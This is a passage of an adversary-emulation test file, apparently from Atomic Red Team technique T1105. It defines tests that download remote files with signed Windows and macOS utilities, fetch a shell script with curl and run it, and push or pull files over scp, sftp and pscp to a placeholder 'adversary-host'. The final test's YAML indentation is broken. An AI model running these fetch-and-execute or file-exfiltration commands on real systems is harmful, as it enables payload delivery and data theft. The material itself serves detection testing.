  dependency_executor_name: powershell
  dependencies:
  - description: |
      #{vbscript_file} must be exist on system.
    prereq_command: |
      if (Test-Path "#{vbscript_file}") {exit 0} else {exit 1}
    get_prereq_command: |
      New-Item -Type Directory (split-path "#{vbscript_file}") -ErrorAction ignore | Out-Null
      Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1105/src/T1105-download-file.vbs" -OutFile "#{vbscript_file}"
  executor:
    name: command_prompt
    command: |
      wscript.exe "#{vbscript_file}"
    cleanup_command: del Atomic-License.txt >nul 2>&1
# curl -sO fetches remote_url into the working directory under its remote name, then
# the script is made executable and run. Cleanup removes payload_name.
# NOTE(review): `chmod +x ... | bash ...` pipes chmod's (empty) stdout into bash;
# bash still executes the file named in its argument, so the test runs, but the
# pipe expresses no ordering and `;` or `&&` would be the clearer form.
- name: Linux Download File and Run
  auto_generated_guid: bdc373c5-e9cf-4563-8a7b-a9ba720a90f3
  description: |
    Utilize linux Curl to download a remote file, chmod +x it and run it.
  supported_platforms:
  - linux
  input_arguments:
    remote_url:
      description: url of remote payload
      type: string
      default: https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1105/src/atomic.sh
    payload_name:
      description: payload name
      type: string
      default: atomic.sh
  executor:
    name: sh
    command: |
      curl -sO #{remote_url}; chmod +x #{payload_name} | bash #{payload_name}
    cleanup_command: |
      rm #{payload_name}
# nimgrab.exe (from the Nim 1.6.6 toolchain zip, extracted into ExternalPayloads by
# get_prereq_command) downloads remote_file to destination_path. Cleanup deletes the
# downloaded file only; the extracted toolchain is left in place.
- name: Nimgrab - Transfer Files
  auto_generated_guid: b1729c57-9384-4d1c-9b99-9b220afb384e
  description: |
    Use nimgrab.exe to download a file from the web.
  supported_platforms:
  - windows
  input_arguments:
    remote_file:
      description: URL of file to copy
      type: url
      default: https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/LICENSE.txt
    destination_path:
      description: Destination path to file
      type: path
      default: '$env:TEMP\Atomic-license.txt'
  dependency_executor_name: powershell
  dependencies:
  - description: |
      NimGrab must be installed on system.
    prereq_command: |
      if (Test-Path "PathToAtomicsFolder\..\ExternalPayloads\nimgrab.exe") {exit 0} else {exit 1}
    get_prereq_command: |
      New-Item -Type Directory "PathToAtomicsFolder\..\ExternalPayloads\" -ErrorAction Ignore -Force | Out-Null
      Invoke-WebRequest "https://nim-lang.org/download/nim-1.6.6_x64.zip" -Outfile "PathToAtomicsFolder\..\ExternalPayloads\nim.zip"
      Expand-Archive -Path "PathToAtomicsFolder\..\ExternalPayloads\nim.zip" -DestinationPath "PathToAtomicsFolder\..\ExternalPayloads\nim" -Force
      Copy-Item "PathToAtomicsFolder\..\ExternalPayloads\nim\nim-1.6.6\bin\nimgrab.exe" "PathToAtomicsFolder\..\ExternalPayloads\nimgrab.exe"
  executor:
    name: command_prompt
    command: |
      cmd /c "PathToAtomicsFolder\..\ExternalPayloads\nimgrab.exe" #{remote_file} #{destination_path}
    cleanup_command: |
      del #{destination_path} >nul 2>&1
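# Invoke-WebRequest launched from cmd: powershell.exe iwr writes remote_file to
# local_path. The original cleanup hard-coded %temp%\Atomic-license.txt and so missed
# the file whenever local_path was overridden; it now deletes #{local_path}, the same
# form the certutil and BITSAdmin tests use.
- name: iwr or Invoke Web-Request download
  auto_generated_guid: c01cad7f-7a4c-49df-985e-b190dcf6a279
  description: |
    Use 'iwr' or "Invoke-WebRequest" -URI argument to download a file from the web. Note: without -URI also works in some versions.
  supported_platforms:
  - windows
  input_arguments:
    remote_file:
      description: URL of file to copy
      type: url
      default: https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/LICENSE.txt
    local_path:
      description: Local path to place file
      type: path
      default: '%temp%\Atomic-license.txt'
  executor:
    name: command_prompt
    elevation_required: true
    command: |
      powershell.exe iwr -URI #{remote_file} -Outfile #{local_path}
    # Delete whatever path the test was actually told to write to.
    cleanup_command: |
      del #{local_path} >nul 2>&1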
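# Notepad++ GUP.exe (signed updater) is handed target_file_url and its SHA256 and
# unzips the result into C:\Temp\Sample. Cleanup removes that folder; C:\Temp itself
# is left behind. The gup_executable argument declared `type: String`, unlike every
# other argument in this file, which uses lowercase `string`; it is normalised here
# so the argument types are uniform for schema consumers.
- name: Arbitrary file download using the Notepad++ GUP.exe binary
  auto_generated_guid: 66ee226e-64cb-4dae-80e3-5bf5763e4a51
  description: |-
    GUP is an open source signed binary used by Notepad++ for software updates, and can be used to download arbitrary files(.zip) from internet/github.
    [Reference](https://x.com/nas_bench/status/1535322182863179776?s=20)
    Upon execution, a sample zip file will be downloaded to C:\Temp\Sample folder
  supported_platforms:
  - windows
  input_arguments:
    target_file_url:
      description: 'URL of the target ZIP file (Eg: https://example.com/test.zip)'
      type: url
      default: https://getsamplefiles.com/download/zip/sample-2.zip
    working_dir:
      description: The directory where GUP.exe & it's dependecies exists
      type: path
      default: 'PathToAtomicsFolder\T1105\bin\'
    gup_executable:
      description: GUP is an open source signed binary used by Notepad++ for software updates
      type: string
      default: 'PathToAtomicsFolder\T1105\bin\GUP.exe'
    target_file_sha256:
      description: SHA256 value of target ZIP file
      type: string
      default: CAC4D26F32CA629DFB10FE614ED00EB1066A0C0011386290D3426C3DE2E53AC6
  dependency_executor_name: powershell
  dependencies:
  - description: Gup.exe binary must exist on disk at specified location (#{gup_executable})
    prereq_command: if (Test-Path "#{gup_executable}") {exit 0} else {exit 1}
    get_prereq_command: |-
      New-Item -Type Directory (split-path "#{gup_executable}") -ErrorAction ignore | Out-Null
      Invoke-WebRequest "https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1105/bin/GUP.exe" -OutFile "#{gup_executable}"
  executor:
    name: command_prompt
    elevation_required: true
    command: |-
      mkdir "c:\Temp"
      cd #{working_dir}
      GUP.exe -unzipTo "" "C:\Temp" "Sample #{target_file_url} #{target_file_sha256}"
    cleanup_command: rmdir /s /q "C:\Temp\Sample" >nul 2>nul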
# macOS nscurl: downloads remote_file to destination_path with certificate checking
# disabled (-k). Cleanup removes the file. Runs unprivileged.
- name: File download via nscurl
  auto_generated_guid: 5bcefe5f-3f30-4f1c-a61a-8d7db3f4450c
  description: |
    Use nscurl to download and write a file/payload from the internet.
    -k = Disable certificate checking
    -o = Output destination
  supported_platforms:
  - macos
  input_arguments:
    remote_file:
      description: URL of remote file to download
      type: url
      default: https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/LICENSE.txt
    destination_path:
      description: Local path to place remote file
      type: path
      default: license.txt
  executor:
    name: sh
    elevation_required: false
    command: nscurl -k "#{remote_file}" -o "#{destination_path}"
    cleanup_command: rm "#{destination_path}"
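- name: File Download with Sqlcmd.exe
  auto_generated_guid: 6934c16e-0b3a-4e7f-ab8c-c414acd32181
  description: |-
    One of the windows packages 'Sqlcmd.exe' can be abused to download malicious files from C2 servers
    This Atomic will exhibit the similar behavior by downloading a sample zip file from src directory of this Technique folder via GitHub URL
  supported_platforms:
  - windows
  input_arguments:
    remote_url:
      description: URL of the C2 Server from where file/s need to be downloaded
      type: url
      default: https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1105/src/T1105.zip
    local_file_path:
      description: The local file path along with filename to where the file needs to be downloaded and placed.
      type: path
      default: C:\T1105.zip
  dependency_executor_name: powershell
  dependencies:
  - description: Windows package 'Sqlcmd' needs to be available on the machine to execute this atomic successfully
    prereq_command: if (Get-Command sqlcmd 2>$null) {exit 0} else {exit 1}
    # NOTE(review): winget can stop on a source/package agreement prompt when run
    # non-interactively; if that happens add --accept-source-agreements --accept-package-agreements.
    get_prereq_command: winget install Microsoft.Sqlcmd --silent 2>$null | Out-Null
  executor:
    # Both values are quoted so a URL with reserved characters or a local path containing
    # spaces reaches sqlcmd as a single argument.
    command: 'sqlcmd -i "#{remote_url}" -o "#{local_file_path}"'
    cleanup_command: Remove-Item "#{local_file_path}" -Force -ErrorAction Ignore
    name: powershell
    elevation_required: true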
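- name: Remote File Copy using PSCP
  auto_generated_guid: c82b1e60-c549-406f-9b00-0a8ae31c9cfe
  description: |
    Copy a staged file using PSCP.exe to a remote SSH target (loopback by default).
  supported_platforms:
  - windows
  input_arguments:
    pscp_url:
      description: pscp.exe download path
      type: string
      default: https://the.earth.li/~sgtatham/putty/latest/w64/pscp.exe
    pscp_binary:
      description: PSCP binary location
      type: string
      default: 'PathToAtomicsFolder\..\ExternalPayloads\pscp.exe'
    scp_user:
      description: Username of the SCP user
      type: string
      default: 'atomic'
    scp_password:
      description: Password for the SCP User
      type: string
      default: 'atomic'
    scp_port:
      description: port for the remote server
      type: string
      default: '22'
    # The test creates this file itself; the parent directory must exist (C:\Temp is created
    # for the default location).
    exfil_package:
      description: path to exfil package
      type: path
      default: 'C:\Temp\T1105_scp.zip'
    target_location:
      description: Remote location where the data will be copied to.
      type: string
      default: 127.0.0.1
    target_filename:
      description: Filename on the destination.
      type: string
      default: T1105_scp.zip
  dependency_executor_name: powershell
  dependencies:
  - description: |
      pscp.exe must be available on the system.
    prereq_command: |
      if (Test-Path "#{pscp_binary}") {exit 0} else {exit 1}
    # NOTE(review): pscp.exe is downloaded from the PuTTY site with no hash or signature
    # check; pin a version and verify it before relying on this prerequisite.
    get_prereq_command: |
      New-Item -Type Directory "PathToAtomicsFolder\..\ExternalPayloads\" -ErrorAction Ignore -Force | Out-Null
      Invoke-WebRequest "#{pscp_url}" -Outfile "PathToAtomicsFolder\..\ExternalPayloads\pscp.exe"
  executor:
    # The staged file is created at #{exfil_package} (previously the default path was
    # hard-coded, so overriding the argument left nothing to copy).  fsutil refuses to
    # overwrite, so a leftover from an earlier run is removed first.  "echo y" auto-accepts
    # the server host key and -pw places the password on the command line; both are visible
    # in process-creation telemetry and are the behaviours worth detecting here.
    command: |
      if not exist "C:\Temp" mkdir "C:\Temp"
      if exist "#{exfil_package}" del /f /q "#{exfil_package}"
      fsutil file createnew "#{exfil_package}" 1048576
      echo y | "#{pscp_binary}" -P #{scp_port} -pw "#{scp_password}" "#{exfil_package}" #{scp_user}@#{target_location}:#{target_filename}
    cleanup_command: |
      del /f /q "#{exfil_package}"
    name: command_prompt
    elevation_required: false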
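- name: Windows push file using scp.exe
  auto_generated_guid: 2a4b0d29-e5dd-4b66-b729-07423ba1cd9d
  description: |
    This test simulates pushing files using SCP on a Windows environment.
  supported_platforms:
  - windows
  input_arguments:
    remote_path:
      description: Path of folder to copy
      type: path
      default: /tmp/
    remote_host:
      description: Remote host to send
      type: string
      default: adversary-host
    local_path:
      description: Local path to copy from
      type: path
      default: C:\temp
    file_name:
      description: Name of the file to transfer
      type: string
      default: T1105.txt
    username:
      description: User account to authenticate on remote host
      type: string
      default: adversary
  dependency_executor_name: powershell
  dependencies:
  - description: |
      This test requires the `scp` command to be available on the system.
    prereq_command: |
      if (Get-Command scp -ErrorAction SilentlyContinue) {
          Write-Output "SCP command is available."
          exit 0
      } else {
          Write-Output "SCP command is not available."
          exit 1
      }
    # Add-WindowsCapability typically needs an elevated session; the catch only reports the
    # failure, so the prereq check above is what actually gates the test.
    get_prereq_command: |
      # Define the capability name for OpenSSH Client
      $capabilityName = "OpenSSH.Client~~~~0.0.1.0"
      try {
          # Install the OpenSSH Client capability
          Add-WindowsCapability -Online -Name $capabilityName -ErrorAction Stop
          Write-Host "OpenSSH Client has been successfully installed." -ForegroundColor Green
      } catch {
          # Handle any errors that occur during the installation process
          Write-Host "An error occurred while installing OpenSSH Client: $_" -ForegroundColor Red
      }
  executor:
    elevation_required: true
    name: powershell
    # The staged file is passed to scp through the already-computed $filePath, quoted, so a
    # local_path containing spaces survives.  If the remote host is reachable scp may stop on
    # the host-key/password prompts; with the placeholder default it simply fails to resolve,
    # which is still enough to exercise the scp.exe process-creation event.
    command: |
      # Check if the folder exists, create it if it doesn't
      $folderPath = "#{local_path}"
      if (-Not (Test-Path -Path $folderPath)) {
          New-Item -Path $folderPath -ItemType Directory
      }
      # Create the file
      $filePath = Join-Path -Path $folderPath -ChildPath "#{file_name}"
      New-Item -Path $filePath -ItemType File -Force
      Write-Output "File created: $filePath"
      # Attack command
      scp.exe "$filePath" "#{username}@#{remote_host}:#{remote_path}"
    cleanup_command: |
      $filePath = Join-Path -Path "#{local_path}" -ChildPath "#{file_name}"
      Remove-Item -Path $filePath -Force -ErrorAction SilentlyContinue
      Write-Output "File deleted: $filePath"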
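- name: Windows pull file using scp.exe
  auto_generated_guid: 401667dc-05a6-4da0-a2a7-acfe4819559c
  description: |
    This test simulates pulling files using SCP on a Windows environment.
  supported_platforms:
  - windows
  input_arguments:
    remote_path:
      description: Path of file to pull
      type: path
      default: /tmp/T1105.txt
    remote_host:
      description: Remote host to pull from
      type: string
      default: adversary-host
    local_path:
      description: Local path to receive files
      type: path
      default: C:\temp
    username:
      description: User account to authenticate on remote host
      type: string
      default: adversary
  dependency_executor_name: powershell
  dependencies:
  - description: |
      This test requires the `scp` command to be available on the system.
    prereq_command: |
      if (Get-Command scp -ErrorAction SilentlyContinue) {
          Write-Output "SCP command is available."
          exit 0
      } else {
          Write-Output "SCP command is not available."
          exit 1
      }
    # Add-WindowsCapability typically needs an elevated session; the catch only reports the
    # failure, so the prereq check above is what actually gates the test.
    get_prereq_command: |
      # Define the capability name for OpenSSH Client
      $capabilityName = "OpenSSH.Client~~~~0.0.1.0"
      try {
          # Install the OpenSSH Client capability
          Add-WindowsCapability -Online -Name $capabilityName -ErrorAction Stop
          Write-Host "OpenSSH Client has been successfully installed." -ForegroundColor Green
      } catch {
          # Handle any errors that occur during the installation process
          Write-Host "An error occurred while installing OpenSSH Client: $_" -ForegroundColor Red
      }
  executor:
    elevation_required: true
    name: powershell
    # Arguments are quoted so a local_path with spaces is handled.  The pulled file is named
    # after the remote path's last component, which the cleanup below mirrors; nothing is
    # left behind when the remote host is unreachable.
    command: |
      scp.exe "#{username}@#{remote_host}:#{remote_path}" "#{local_path}"
    cleanup_command: |
      $pulled = Join-Path -Path "#{local_path}" -ChildPath (Split-Path -Path "#{remote_path}" -Leaf)
      Remove-Item -Path $pulled -Force -ErrorAction SilentlyContinue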
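- name: Windows push file using sftp.exe
  auto_generated_guid: 205e676e-0401-4bae-83a5-94b8c5daeb22
  description: |
    This test simulates pushing files using SFTP on a Windows environment.
  supported_platforms:
  - windows
  input_arguments:
    remote_path:
      description: Remote directory to upload into
      type: path
      default: /tmp
    remote_host:
      description: Remote host to send
      type: string
      default: adversary-host
    local_path:
      description: Local directory holding the staged file
      type: path
      default: C:\temp
    file_name:
      description: Name of the file to transfer
      type: string
      default: T1105.txt
    username:
      description: User account to authenticate on remote host
      type: string
      default: adversary
  dependency_executor_name: powershell
  dependencies:
  - description: |
      This test requires the `sftp` command to be available on the system.
    prereq_command: |
      if (Get-Command sftp -ErrorAction SilentlyContinue) {
          Write-Output "SFTP command is available."
          exit 0
      } else {
          Write-Output "SFTP command is not available."
          exit 1
      }
    # Add-WindowsCapability typically needs an elevated session; the catch only reports the
    # failure, so the prereq check above is what actually gates the test.
    get_prereq_command: |
      # Define the capability name for OpenSSH Client
      $capabilityName = "OpenSSH.Client~~~~0.0.1.0"
      try {
          # Install the OpenSSH Client capability
          Add-WindowsCapability -Online -Name $capabilityName -ErrorAction Stop
          Write-Host "OpenSSH Client has been successfully installed." -ForegroundColor Green
      } catch {
          # Handle any errors that occur during the installation process
          Write-Host "An error occurred while installing OpenSSH Client: $_" -ForegroundColor Red
      }
  executor:
    elevation_required: true
    name: powershell
    # The sftp "put" command is fed on stdin with the already-computed $filePath quoted, so
    # a local_path containing spaces is uploaded as one file rather than split by sftp.
    command: |
      # Check if the folder exists, create it if it doesn't
      $folderPath = "#{local_path}"
      if (-Not (Test-Path -Path $folderPath)) {
          New-Item -Path $folderPath -ItemType Directory
      }
      # Create the file
      $filePath = Join-Path -Path $folderPath -ChildPath "#{file_name}"
      New-Item -Path $filePath -ItemType File -Force
      Write-Output "File created: $filePath"
      # Attack command
      echo "put `"$filePath`"" | sftp "#{username}@#{remote_host}:#{remote_path}"
    # -ErrorAction SilentlyContinue keeps cleanup quiet when the file was never created,
    # matching the scp push test.
    cleanup_command: |
      $filePath = Join-Path -Path "#{local_path}" -ChildPath "#{file_name}"
      Remove-Item -Path $filePath -Force -ErrorAction SilentlyContinue
      Write-Output "File deleted: $filePath"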
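- name: Windows pull file using sftp.exe
  auto_generated_guid: 3d25f1f2-55cb-4a41-a523-d17ad4cfba19
  description: |
    This test simulates pulling files using SFTP on a Windows environment.
  supported_platforms:
  - windows
  input_arguments:
    remote_path:
      description: Path of file to pull
      type: path
      default: /tmp/T1105.txt
    remote_host:
      description: Remote host to pull from
      type: string
      default: adversary-host
    local_path:
      description: Local path to receive files
      type: path
      default: C:\temp
    username:
      description: User account to authenticate on remote host
      type: string
      default: adversary
  dependency_executor_name: powershell
  dependencies:
  - description: |
      This test requires the `sftp` command to be available on the system.
    prereq_command: |
      if (Get-Command sftp -ErrorAction SilentlyContinue) {
          Write-Output "SFTP command is available."
          exit 0
      } else {
          Write-Output "SFTP command is not available."
          exit 1
      }
    # Add-WindowsCapability typically needs an elevated session; the catch only reports the
    # failure, so the prereq check above is what actually gates the test.
    get_prereq_command: |
      # Define the capability name for OpenSSH Client
      $capabilityName = "OpenSSH.Client~~~~0.0.1.0"
      try {
          # Install the OpenSSH Client capability
          Add-WindowsCapability -Online -Name $capabilityName -ErrorAction Stop
          Write-Host "OpenSSH Client has been successfully installed." -ForegroundColor Green
      } catch {
          # Handle any errors that occur during the installation process
          Write-Host "An error occurred while installing OpenSSH Client: $_" -ForegroundColor Red
      }
  executor:
    elevation_required: true
    name: powershell
    # Arguments are quoted so a local_path with spaces is handled.  The pulled file takes the
    # remote path's last component as its name, which the cleanup below removes if present.
    command: |
      sftp.exe "#{username}@#{remote_host}:#{remote_path}" "#{local_path}"
    cleanup_command: |
      $pulled = Join-Path -Path "#{local_path}" -ChildPath (Split-Path -Path "#{remote_path}" -Leaf)
      Remove-Item -Path $pulled -Force -ErrorAction SilentlyContinue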
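- name: Download a file with OneDrive Standalone Updater
  auto_generated_guid: 3dd6a6cf-9c78-462c-bd75-e9b54fc8925b
  description: |
    Uses OneDrive Standalone Updater to download a file from a specified URL by setting up the required registry keys.
    This technique can be used to download files without executing anomalous executables.
    Reference: https://lolbas-project.github.io/lolbas/Binaries/OneDriveStandaloneUpdater/
  supported_platforms:
  - windows
  input_arguments:
    remote_url:
      description: URL to download file from
      type: url
      default: https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/LICENSE.txt
    # Resolved via $env:LOCALAPPDATA (the same root the cleanup uses) instead of a
    # hand-built C:\Users\<name>\AppData\Local path, so relocated profiles still resolve.
    # The value is expanded because every use below places it inside double quotes.
    onedrive_path:
      description: Path to OneDrive Standalone Updater executable
      type: path
      default: '$env:LOCALAPPDATA\Microsoft\OneDrive\OneDriveStandaloneUpdater.exe'
  dependency_executor_name: powershell
  dependencies:
  - description: |
      OneDriveStandaloneUpdater.exe must exist on disk at specified location
    prereq_command: |
      if (Test-Path "#{onedrive_path}") {exit 0} else {exit 1}
    # There is no unattended install path for the per-user OneDrive client, so the
    # prerequisite can only report what is missing.
    get_prereq_command: |
      Write-Host "OneDriveStandaloneUpdater.exe not found at #{onedrive_path}. Please install OneDrive or specify correct path."
  executor:
    # The three *FromOC URL values under HKCU\...\UpdateOfficeConfig are all pointed at
    # remote_url and the timestamp is set far in the future; those registry writes, followed
    # by the updater's outbound request, are the detectable part of this technique.
    command: |
      if (-not (Test-Path "#{onedrive_path}")) {
          Write-Host "OneDriveStandaloneUpdater.exe not found at #{onedrive_path}. Test cannot continue."
          exit 1
      }
      New-Item -Path "HKCU:\Software\Microsoft\OneDrive\UpdateOfficeConfig" -Force | Out-Null
      Set-ItemProperty -Path "HKCU:\Software\Microsoft\OneDrive\UpdateOfficeConfig" -Name "UpdateRingSettingURLFromOC" -Value "#{remote_url}" -Type String -Force
      Set-ItemProperty -Path "HKCU:\Software\Microsoft\OneDrive\UpdateOfficeConfig" -Name "ODSUUpdateXMLUrlFromOC" -Value "#{remote_url}" -Type String -Force
      Set-ItemProperty -Path "HKCU:\Software\Microsoft\OneDrive\UpdateOfficeConfig" -Name "UpdateXMLUrlFromOC" -Value "#{remote_url}" -Type String -Force
      Set-ItemProperty -Path "HKCU:\Software\Microsoft\OneDrive\UpdateOfficeConfig" -Name "UpdateOfficeConfigTimestamp" -Value 99999999999 -Type QWord -Force
      # Run OneDrive Standalone Updater
      & "#{onedrive_path}"
    # The cleanup treats StandaloneUpdater\PreSignInSettingsConfig.json as the location the
    # fetched content is written to -- confirm against the LOLBAS entry if it moves.
    cleanup_command: |
      Remove-Item -Path "HKCU:\Software\Microsoft\OneDrive\UpdateOfficeConfig" -Force -ErrorAction Ignore
      Remove-Item -Path "$env:LOCALAPPDATA\Microsoft\OneDrive\StandaloneUpdater\PreSignInSettingsConfig.json" -Force -ErrorAction Ignore
    name: powershell
    elevation_required: false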
- name: Curl Insecure Connection from a Pod
auto_generated_guid: 7e2ad0db-1efa-4af2-a77c-bc6e87d7b3f3
description: |
Launches an Ubuntu pod, installs curl, and executes curl with insecure flags (-k/--insecure)
against a target URL. The pod is automatically deleted after execution.
supported_platforms:
- containers
input_arguments:
pod_name:
description: K8s pod_name to execute the command in
type: string
default: atomic-insecure-curl
remote_url:
description: Remote URL to curl
type: string
default: https://malicious-apt.com
image_name:
description: Name of the docker image
type: string
default: curlimages/curl
dependencies:
- description: kubectl must be installed and configured
get_prereq_command: |
echo "kubectl must be installed manually"
prereq_command: |
which kubectl
executor:
name: bash
elevation_required: false
command: |
kubectl run #{pod_name} --image=#{image_name} --restart=Never --rm -it -- curl -ksL #{remote_url}